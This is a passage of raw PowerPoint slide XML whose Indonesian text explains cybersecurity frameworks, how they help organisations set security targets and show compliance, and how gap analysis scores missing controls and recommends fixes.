              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hampa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fondasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperhitungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>obyektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>struktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesenjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disyaratkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direkomendasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengadopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesenjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rinci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekomendasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14945499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Vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengesahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
